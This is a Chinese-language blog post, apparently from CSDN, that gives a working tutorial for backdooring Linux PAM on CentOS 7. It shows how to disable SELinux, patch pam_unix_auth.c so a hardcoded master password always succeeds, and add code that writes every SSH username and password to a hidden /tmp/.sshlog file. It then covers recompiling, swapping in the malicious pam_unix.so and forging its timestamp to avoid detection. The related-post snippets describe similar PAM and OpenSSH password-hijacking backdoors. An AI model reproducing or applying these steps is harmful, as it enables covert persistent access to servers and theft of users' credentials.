linux rsa登录改密码登录_Linux PAM后门:窃取ssh密码及自定义密码登录

最新推荐文章于 2024-02-19 08:00:00 发布
最新推荐文章于 2024-02-19 08:00:00 发布
阅读量234 收藏
点赞数
文章标签: linux rsa登录改密码登录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_26642481/article/details/112540141
版权

PAM是Linux默认的ssh认证登录机制,因为他是开源的,我们可以修改源码实现自定义认证逻辑,达到记录密码、自定义密码登录、dns带外等功能。

环境

  • CentOS Linux release 7.8.2003 (Core)

  • pam-1.1.8-23.el7.x86_64

3baa6e09cde9a5039295731c57aa88b7.png

centos需要关闭selinux,临时关闭setenforce 0。永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。

4e6dd8af94f85363004f64a2a7b71c62.png

自定义ssh密码

查看PAM版本rpm -qa|grep pam

下载对应源码:http://www.linux-pam.org/library/

wget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gztar zxvf Linux-PAM-1.1.8.tar.gz

安装gcc编译器和flex库

yum install gcc flex flex-devel -y

修改Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c源码实现自定义密码认证

de7549885d1f3b8e9a3fed95b7b3dbbd.png

/* verify the password of this user */retval = _unix_verify_password(pamh, name, p, ctrl);if(strcmp("fuckyou",p)==0){return PAM_SUCCESS;}name = p = NULL;

编译生成so文件

cd Linux-PAM-1.1.8./configure --prefix=/user --exec-prefix=/usr --localstatedir=/var --sysconfdir=/etc --disable-selinux --with-libiconv-prefix=/usrmake

生成的恶意认证so路径在./modules/pam_unix/.libs/pam_unix.so。用它来替换系统自带的pam_unix.so。

因为系统不同位数不同,pam_unix.so的路径也不一样,尽量用find找一下。

b2d0335b1255f5cd49f51ab5a05bf05f.png

然后替换,注意先备份,万一恶意的so文件不可用就GG了。

cp /usr/lib64/security/pam_unix.so /tmp/pam_unix.so.bakcp /root/Linux-PAM-1.1.8/modules/pam_unix/.libs/pam_unix.so /usr/lib64/security/pam_unix.so

d71bd52f8ac2f9bb944482b4d6e72e34.png

此时先别急着断开ssh,先试一下能不能用我们设置的fuckyou密码登录。eec8b4940f8aded204113333eed5dbf7.png

成功登录,后门也就留好了。为了隐蔽,修改下pam_unix.so的时间戳

touch pam_unix.so -r pam_umask.so

b1e98cc8f871ba46edafad902f5cd9ae.png

记录密码

同样编辑modules/pam_unix/pam_unix_auth.c文件

a5579b110e6e7a03d733fa08ef7055aa.png

if(retval == PAM_SUCCESS){    FILE * fp;    fp = fopen("/tmp/.sshlog", "a");    fprintf(fp, "%s : %s\n", name, p);    fclose(fp);}

ssh密码会被记录到/tmp/.sshlog中。编译并替换so

cd Linux-PAM-1.1.8make clean && makecp /root/Linux-PAM-1.1.8/modules/pam_unix/.libs/pam_unix.so /usr/lib64/security/pam_unix.so

此时登录ssh会记录密码

644ac3b8454a897434c82cfc48a0e9e8.png

分享、点赞、在看就是对我们的一种支持!

1ef329c6b1c4c5f36b9b00313df2e4d2.png

李_涛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux PAM开发示例二:登录系统时使用自己的PAM模块进行密码认证
ljq32的专栏
07-31 2781
本文仅仅是一个示例,没有多余的说教内容,实现在登录Linux时命令行、图形界面、su等密码认证时使用自己的PAM模块进行密码认证,这个示例不需要编写应用程序,因为系统的登录程序就是应用程序,例如:login、su、lightdm。 1。编写PAM模块动态库 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <security/pam_appl.h> #include &
pam-1.1.8-23.el7.x86_64.rpm
07-30
pam-1.1.8-23.el7.x86_64.rpm
自动劫持 root 密码并转发到邮箱
Permission_777的博客
02-14 585
软件包 0x06-openssh-5.9p1.patch.tar.gz openssh-5.9p1.tar.gz inotify-tools-3.13.tar.gz 1、安装 gcc [root@ localhost ~]# yum -y install epel-release [root@ localhost ~]# yum -y install gcc 2、安装 0x06-openss...
LINUX后门--教程(六)—— PAM后门
W小哥
07-14 5562
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、PAM后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 靶机 IP: 192.168.160.144 (centos7) 攻击IP: 192.168.160.1 (win10 xhell) 2.1 pam介绍 在过去,我们想要对一个使用者进行认证 (authentication),得要要求用户输入账号口令, 然后透过
SSH PAM后门(万能密码、记录密码
网络安全。
08-19 3387
PAMLinux默认的ssh认证登录机制,我们可以通过修源码来实现万能密码,记录登陆密码等功能。 1、在centos中需要关闭selinux。 永久关闭需要修/etc/selinux/config,将其中SELINUX设置为disabled。 2、查看PAM版本。 rpm -qa|grep pam 源码下载地址:http://www.linux-pam.org/library/ 3、解压。 wget http://www.linux-pam.org/library/Linux-PAM-1.1.8
pam-devel-1.1.8-23.el7.x86_64.rpm
07-30
pam-devel-1.1.8-23.el7.x86_64.rpm
LinuxSSH密码登录配置详解
09-14
本文将详细介绍如何在Linux环境下配置SSH密码登录。 首先,确保你有两台Linux服务器,分别称为server1和server2,它们的IP地址和登录用户名如标题和描述中所示。为了实现SSH密码登录,你需要进行以下步骤: 1....
linux远程登录ssh密码配置方法
09-15
Linux远程登录SSH密码配置详解》 在Linux系统中,SSH(Secure SHell)是一种安全的网络协议,用于在不安全的网络环境下提供加密的远程登录和其他服务。免密码登录SSH是提升效率和保障安全的重要配置,尤其在...
设置ssh密码登录linux服务器的方法
09-14
总结,SSH密码登录Linux服务器涉及到生成RSA密钥对、复制公钥到服务器、配置`sshd_config`以及使用shell脚本或`expect`简化登录流程。这种方式提高了运维效率,减少了手动输入密码的麻烦,但务必注意安全问题,...
Linux配置远程SSH密码登录
09-15
以下是Linux配置远程SSH密码登录的详细步骤,以CentOS 6.8为例: 1. **创建公钥和私钥**: 使用`ssh-keygen`命令生成RSA类型的公钥和私钥对。运行以下命令: ``` [root@test ~]# ssh-keygen -t rsa ...
pam-1.1.8-22.el7.x86_64.rpm
11-30
离线安装包,亲测可用
Linux两台服务器之间复制文件及免密码登录的方法
09-15
Linux环境中,尤其是在管理和维护多台服务器时,高效地在服务器之间复制文件和实现免密码登录是至关重要的。本文将详细讲解如何在两台Linux服务器之间进行文件复制以及设置免密码登录,以简化日常运维工作。 首先...
PAM 认证劫持
枫梓林のBlog
05-21 854
自动劫持 root 密码并转发密码到邮箱 文章目录自动劫持 root 密码并转发密码到邮箱1.PAM 认证简介2.程序验证方法3.通过 PAM 认证模块劫持密码3.1 查看 PAM 版本3.2 安装 gcc 和 pam 依赖4.安装 PAM 认证模块 1.PAM 认证简介 PAM(Pluggable Authentication Modules)即可插拔式认证模块,它是一种高效而且灵活的用户级别的认证方式,它也是当前Linux服务器普遍使用的认证方式。PAM可以根据用户的网段、时间、用户名、密码等实现认证
Linux UserSpace Back-Door、Rootkit SSH/PAM Backdoor Attack And Defensive Tchnology
weixin_33778544的博客
06-24 230
catalog 0. 引言 1. Pam后门 2. SSH后门 3. Hijacking SSH 4. Hijacking SSH By Setup A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication 5. Hijacking Active SS...
CentOS7 升级到最新OpenSSH 8.8p1详细脚本
sinat_20260363的博客
12-26 1789
致谢:feichai2020年07月16日于废柴博客发表:Centos7 升级OpenSSH 8.2p1的详细步骤【附安装包、脚本】 一、升级前检查系统版本: [root@localhost ~]# cat /etc/os-release NAME="CentOS Linux" VERSION="7 (Core)" ID="centos" ID_LIKE="rhel fedora" VERSION_ID="7" PRETTY_NAME="CentOS Linux 7 (Core)" ANSI...
Linux 安全之pam后门
weixin_34218890的博客
12-20 409
本文方法来自网络:Sky原创本文测试环境为:RHEL 6.1 X64一.查看系统pam版本:[root@redkey ~]# rpm -qa | grep pam pam-1.1.1-4.el6.x86_64二.下载对应版本的pam模块http://www.linux-pam.org/library/三.解压&修pam_unix_auth.c文件tar -xzvf ...
持久化:利用Linux PAM创建后门
最新发布
qq_68163788的博客
02-19 1354
PAM(Pluggable Authentication Modules)是Linux系统中用于身份验证的模块化框架。通过利用PAM,可以创建一个后门来绕过系统的认证机制,从而获得未经授权的访问权限。 要创建一个后门,首先需要编写一个自定义PAM模块,该模块可以在用户登录时执行特定的操作,例如绕过密码验证或者添加一个额外的认证方式。接着,将这个自定义PAM模块加载到系统中,并配置PAM以在用户登录时使用该模块。 通过这种方式,攻击者可以在系统中创建一个隐藏的后门,同时绕过正常的认证流程,
利用Openssh后门 劫持root密码
a790308的博客
08-25 340
Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下, 可以通过修或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门, 达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSSH后门是入侵者的惯用方式之一,OpenSSh后门比较难于检测 ...
linux上的PAM后门理解与学习
Shanfenglan's blog
09-09 1269
文章目录1. 什么是PAM2. 读懂PAM配置文件 1. 什么是PAM 全称为Pluggable Authentication Modules,是一种身份认证机制。直译是可插入的身份验证模块。 简单理解为,应用程序可以调用PAM给的接口来进行身份验证而不用自己去写详细的身份验证模块,将身份验证端于服务端分离,根据返回值来决定验证是否通过进而是否提供服务,具体验证规则取决于自定义的配置文件,也就是/etc/pam.d/下的配置文件,例如sshd服务的配置文件就为/etc/pam.d/sshd。 2. 读懂P
linux登录ssh携带密码
05-11
在使用ssh登录Linux时,通常不建议携带密码,因为这样会将密码暴露在命令行中,从而可能会被其他人窃取。如果你不想每次都手动输入密码,可以使用ssh密钥登录。具体步骤如下: 1. 生成密钥对 使用ssh-keygen命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值